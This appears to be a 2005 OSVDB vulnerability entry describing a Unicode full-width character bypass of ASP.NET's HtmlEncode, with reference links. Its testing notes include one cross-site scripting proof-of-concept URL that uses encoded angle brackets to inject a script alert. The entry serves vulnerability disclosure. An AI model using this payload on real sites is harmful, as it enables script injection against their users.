Microsoft ASP.NET HttpServerUtility.HtmlEncode Unicode Character Bypass

2005-02-16T09:28:01
ID OSVDB:13928
Type osvdb
Reporter OSVDB
Modified 2005-02-16T09:28:01

Description

Manual Testing Notes

http://[victim]/attack3.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

References:

Secunia Advisory ID:14214 Related OSVDB ID: 13926 Related OSVDB ID: 13927 Other Advisory URL: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0251.html